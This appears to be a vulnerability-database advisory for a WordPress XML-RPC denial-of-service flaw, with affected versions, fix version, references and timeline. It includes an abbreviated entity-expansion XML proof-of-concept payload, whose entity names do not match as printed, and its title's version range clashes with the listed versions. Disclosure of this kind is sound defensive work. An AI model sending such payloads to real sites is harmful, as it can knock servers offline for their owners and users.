WordPress Vulnerabilities

WordPress 3.5-3.7.1 - XML-RPC Denial of Service

Proof of Concept

<?xml version="1.0"?>
<!DOCTYPE DoS [
<!ENTITY a "xxxxxxxxxxxxxxxxx...">
]>
<DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;…</DoS>

Affects WordPress

3.5
Fixed in WordPress 3.9.2
3.5.1
Fixed in WordPress 3.9.2
3.5.2
Fixed in WordPress 3.9.2
3.6
Fixed in WordPress 3.9.2
3.6.1
Fixed in WordPress 3.9.2
3.8
Fixed in WordPress 3.9.2
3.8.1
Fixed in WordPress 3.9.2
3.7.1
Fixed in WordPress 3.9.2

References

URL
https://web.archive.org/web/20140825133704/http://www.breaksec.com/?p=6362
URL
https://wordpress.org/news/2014/08/wordpress-3-9-2/

Miscellaneous

Original Researcher
Nir Goldshlager
Verified
Yes
WPVDB ID
6214e783-978a-4ecb-95c0-2b7f12d7c348

Timeline

Publicly Published
2014-08-27 (about 9 years ago)
Added
2014-08-27 (about 9 years ago)
Last Updated
2021-01-19 (about 3 years ago)

Other

Published
Title
Published
2018-06-07
Title
Mass Pages/Posts Creator <= 1.2.4 - DoS
Published
2020-10-29
Title
WordPress < 5.5.2 - Unauthenticated DoS Attack to RCE
Published
2018-02-05
Title
WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Published
2021-10-25
Title
Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS
Published
2022-01-17
Title
Popup | Custom Popup Builder < 1.3.1 - Unauthenticated Denial of Service